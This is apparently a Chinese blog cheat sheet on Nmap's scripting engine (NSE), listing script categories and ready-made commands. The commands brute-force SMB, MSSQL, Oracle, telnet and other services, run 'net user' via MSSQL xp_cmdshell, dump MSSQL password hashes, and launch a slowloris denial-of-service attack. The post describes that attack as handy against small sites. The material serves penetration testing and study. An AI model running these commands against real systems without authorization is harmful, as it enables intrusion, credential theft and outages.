Nmap脚本引擎NSE

最新推荐文章于 2023-09-13 20:39:53 发布
最新推荐文章于 2023-09-13 20:39:53 发布
阅读量472 收藏
点赞数 1
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42143925/article/details/105065735
版权

Nmap提供的命令行参数如下:

-sC: 等价于–script=default ,使用默认类别的脚本进行扫描 可更换其他类别 

--script=<Lua scripts> : <Lua scripts>使用某个或某类脚本进行扫描,支持通配符描述

--script-args=<n1=v1,[n2=v2,...]> : 为脚本提供默认参数

--script-args-file=filename : 使用文件来为脚本提供参数

--script-trace : 显示脚本执行过程中发送与接收的数据

--script-updatedb : 更新脚本数据库

--script-help=<scripts> : 显示脚本的帮助信息,其中<scripts>部分可以逗号 分隔的文件或脚本类别

例: Nmap查看脚本的详细介绍:nmap --script-help nfs-ls

运行某个脚本: nmap --script=nfs-ls [目标Ip]

  1. nmap按脚本分类扫描
  • --script=类别 来使用 例:nmap --script=auth 192.168.137.*
      • auth: 负责处理鉴权证书(绕开鉴权)的脚本
      • broadcast: 在局域网内探查更多服务开启状况,如dhcp/dns/sqlserver等服务
      • brute: 提供暴力破解方式,针对常见的应用如http/snmp等
      • default: 使用-sC或-A选项扫描时候默认的脚本,提供基本脚本扫描能力
      • discovery: 对网络进行更多的信息,如SMB枚举、SNMP查询等
      • dos: 用于进行拒绝服务攻击
      • exploit: 利用已知的漏洞入侵系统
      • external: 利用第三方的数据库或资源,例如进行whois解析
      • fuzzer: 模糊测试的脚本,发送异常的包到目标机,探测出潜在漏洞 intrusive: 入侵 性的脚本,此类脚本可能引发对方的IDS/IPS的记录或屏蔽
      • malware: 探测目标机是否感染了病毒、开启了后门等信息
      • safe: 此类与intrusive相反,属于安全性脚本
      • version: 负责增强服务与版本扫描(Version Detection)功能的脚本
      • vuln: 负责检查目标机是否有常见的漏洞(Vulnerability),如是否有MS08_067
  1. nmap按应用服务扫描
  • vnc扫描:

检查vnc bypass nmap --script=realvnc-auth-bypass 192.168.137.4

检查vnc认证方式 nmap --script=vnc-auth 192.168.137.4

获取vnc信息 nmap --script=vnc-info 192.168.137.4

  • smb扫描:

smb破解

1

nmap  --script=smb-brute.nse 192.168.137.4  

smb字典破解

1

nmap --script=smb-brute.nse --script-args=userdb=/var/passwd,passdb=/var/passwd 192.168.137.4  

smb已知几个严重漏

1

nmap  --script=smb-check-vulns.nse --script-args=unsafe=1 192.168.137.4    

查看共享目录  

1

nmap -p 445  --script smb-ls --script-args 'share=e$,path=\,smbuser=test,smbpass=test' 192.168.137.4    

查询主机一些敏感信息(注:需要下载nmap_service)

1

nmap -p 445 -n –script=smb-psexec --script-args= smbuser=test,smbpass=test 192.168.137.4   

查看会话

1

nmap -n -p445 --script=smb-enum-sessions.nse --script-args=smbuser=test,smbpass=test 192.168.137.4    

系统信息

1

nmap -n -p445 --script=smb-os-discovery.nse --script-args=smbuser=test,smbpass=test 192.168.137.4 

  • Mssql扫描:

猜解mssql用户名和密码

1

nmap -p1433 --script=ms-sql-brute --script-args=userdb=/var/passwd,passdb=/var/passwd 192.168.137.4   

xp_cmdshell 执行命令 

1

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="net user" 192.168.137.4      

dumphash值

1

nmap -p 1433 --script ms-sql-dump-hashes.nse --script-args mssql.username=sa,mssql.password=sa  192.168.137.4      

  • Mysql扫描:

扫描root空口令

1

nmap -p3306 --script=mysql-empty-password.nse 192.168.137.4   

列出所有mysql用户

1

nmap -p3306 --script=mysql-users.nse --script-args=mysqluser=root 192.168.137.4   

支持同一应用的所有脚本扫描

1

nmap --script=mysql-* 192.168.137.4  

  • Oracle扫描:

oracle sid扫描

1

nmap --script=oracle-sid-brute -p 1521-1560 192.168.137.5  

oracle弱口令破解

1

nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL,userdb=/var/passwd,passdb=/var/passwd 192.168.137.5

  • 其他一些比较好用的脚本

nmap --script=broadcast-netbios-master-browser 192.168.137.4   发现网关

nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' 192.168.137.4  破解rsync

nmap --script informix-brute -p 9088 192.168.137.4    informix数据库破解

nmap -p 5432 --script pgsql-brute 192.168.137.4       pgsql破解

nmap -sU --script snmp-brute 192.168.137.4            snmp破解

nmap -sV --script=telnet-brute 192.168.137.4          telnet破解

nmap --script=http-vuln-cve2010-0738 --script-args 'http-vuln-cve2010-0738.paths={/path1/,/path2/}' <target>  jboss autopwn

nmap --script=http-methods.nse 192.168.137.4 检查http方法

nmap --script http-slowloris --max-parallelism 400 192.168.137.4  dos攻击,对于处理能力较小的站点还挺好用的 'half-HTTP' connections 

nmap --script=samba-vuln-cve-2012-1182  -p 139 192.168.137.4

 

亮哥神话
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
nmap --script常用脚本简介
十五年游戏主程转渗透之路
03-01 1万+
nmap,script
Nmap脚本使用
ChuMeng1999的博客
09-23 170
在使用脚本时,如果脚本支持,我们还可以通过–script-args传入参数,还是以http-method为例,我们知道一些网站会通过判断user-agent来判断请求是否合法,那nmap在请求时有没有带上自己的特征呢?我们在脚本库中看到和http相关的脚本都是以http-的方式命名的,其他的也是一样,比如与ssh相关的都是以ssh-的方式命名。那么我们不仅限于使用,还想知道这其中的细节呢?可以使用种类的名字调用该分类下的全部脚本,比–scritp vuln,不过这比较费时间,在此就不演示了。
nmap-script使用帮助手册
04-08
nmap-script使用帮助手册、400多个脚本使用帮助手册。
NFS不安全的配置漏洞
weixin_46564680的博客
10-13 2157
NFS不安全的配置漏洞 NFS简述: 网络文件系统(英语:Network File System,缩写作 NFS)是一种分布式文件系统,力求客户端主机可以访问服务器端文件,并且其过程与访问本地存储时一样,允许网络上的用户以类似于本地存储的方式访问共享文件夹。 NFS服务的默认开放端口为2049/TCP。 漏洞检测: NFS不安全配置漏洞检测可以通过漏洞扫描工具发现 Nessus漏洞报告详情 使用NMAP检测漏洞 使用NMAP扫描发现目标开放2049端口 查看nmap自带的和NFS相关的
Nmap Script脚本使用指南
weixin_45116657的博客
12-30 8103
目录 Nmap介绍 一、脚本参数 二、实战 ​ 三、延伸 四、总结 Nmap介绍 nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统。它是网络管理员必用的软件之一,以及用以评估网络系统安全。 在某些时候,我们大部分都使用Nmap进行扫描,然后再通过Metasploit进行漏洞利用,但是这个过程比...
nmap脚本编写和使用
Kali与编程
07-04 1393
本文介绍了nmap脚本编写和使用的常用选项和参数,包括nmap脚本库的下载和安装、n map的常用选项和参数、以及常用的nmap脚本。本文介绍了nmap脚本编写和使用的基础知识,包括nmap脚本库的下载和安装、nmap脚本的编写和调试、nmap脚本的执行和输出等内容。通过本文的学习,读者可以了解到nmap脚本的基本功能和使用方法,并且可以编写简单的nmap脚本文件,实现一些基础的主机和服务探测功能。nmap脚本的基本原理是通过使用nmap脚本引擎,执行用户编写的脚本文件,以实现特定的扫描和攻击任务。
NMAP 使用 NSE 脚本
qq_25205059的博客
07-25 607
Nmap 有一个少为人知的部分是NSE脚本引擎NSENmap 的最强大和灵活的功能之一。它允许用户编写(并共享)简单的脚本来自动执行各种网络任务。Nmap 内置了全面的 NSE 脚本集合,用户可以轻松使用这些 Nse脚本或者创建自定义 Nse 脚本以满足他们的个性化需求 安装 NSE 脚本 步骤 1 安装 Nmap-Vulners 要安装 nmap-vulners 脚本,我们首先使用cd切换到 Nmap 脚本目录 cd /usr/share/nmap/scripts/ 然后,通过在终端中输入
nmap-nse-scripts:已定制或创建的Nmap NSE脚本
02-05
Nmap Network Security Scanner Extensions(NSE)是Nmap的一个强大功能,它允许用户通过编写脚本来扩展Nmap的功能,进行更复杂的网络扫描和审计任务。"nmap-nse-scripts"就是一组自定义或创建的Nmap NSE脚本集合,...
nmap-scripts:Nmap NSE脚本的集合
02-03
标题中的"nmap-scripts:Nmap NSE脚本的集合"指出,这个压缩包包含的是Nmap NSE脚本的完整集合。这些脚本旨在提供多样化的网络扫描功能,包括但不限于端口扫描、服务识别、漏洞检测、配置分析、安全审计等。这些脚本...
Halcyon-IDE:第一个用于Nmap脚本NSE)开发的IDE
02-19
最初的想法是为从事Nmap脚本开发的信息安全社区提供一个更简单的开发界面。 该项目最初是为个人使用而开发的,后来与社区一起发布了开源版本,希望能够帮助志趣相投的nmap脚本开发人员。特征IDE当然只是普通的文本...
nmap-nse-scripts:我的nmap NSE脚本集合
02-03
NSENmap脚本引擎)开发的存储库。 您可以从我的研讨会中找到我的脚本(包括非官方的脚本),库,资源和其他相关材料。 去做 -完成SMB2 NSE库-当前正在使用密码处理功能 Paulino Calderon calderon()websec.mx
Nmap介绍及使用
weixin_56416078的博客
05-13 1万+
一、简介 1,设计目的:快速扫描大型网络/单个主机。 2,如何实现:使用原始IP报文来发现网络上有哪些主机,主机提供什么服务,操作系统,使用什么类型的报文过滤器/防火墙,以及其他功能。 3,nmap用途:常用于安全审核。许多系统管理员和网络管理员也用它来做一些日常的工作,比如查看整个网络的信息,管理服务升级计划。 4, nmap脚本引擎NSE:可以添加自己的代码,打造自己的工具。 nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行...
NMAP使用手册
ytdd66的博客
09-13 340
【代码】NMAP使用手册。
nmap-常用命令总结
枫梓林のBlog
04-19 660
Nmap 常用命令总结 文章目录Nmap 常用命令总结基本命令使用脚本使用按脚本分类扫描按应用服务扫描vnc扫描smb扫描Mssql扫描Mysql扫描Oracle扫描好用的脚本 基本命令使用 格式: nmap [ <扫描类型> …] [ <选项> ] { <扫描目标说明> } 常用命令 全面扫描:nmap-T4 -A targetip 主机发现:nmap-T4 -sn targetip 端口扫描:nmap-T4 targetip 服务扫描:nmap-T4
nmap中--script功能的使用
0ffs3t
11-17 1万+
在新的nmap版本中,添加了script功能的使用。在nmap的安装目录的share/nmap/scripts中,已经有将61个写好的脚本提供。 具体的用法可以参考:http://nmap.org/book/nse-usage.html  在这儿举几个具体的例子: nmap --script=smb-enum-users 192.168.199.9 对19
nmap挖掘服务器漏洞(黑客攻击), script详解
键盘的起始页
08-10 1636
Nmap脚本引擎NSE)革新了Nmap的功能,已经存在有14个类别涵盖广泛的任务,从网络发现到检测和利用安全漏洞。
Nmap扫描工具的使用
热门推荐
qq_43688708的博客
03-04 1万+
Nmap工具的简单介绍与使用
实操:VRRP配置实验演练演示.mp4
最新发布
07-09
基于华为模拟器ENSP
nmap 渗透测试脚本
08-17
虽然Nmap本身不是一个脚本,但它提供了Nmap脚本引擎NSE),允许用户执行自定义的脚本来扩展其功能。这些脚本可以用于执行各种渗透测试任务,如服务识别、漏洞探测、操作系统识别等。 以下是一个使用Nmap进行渗透...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值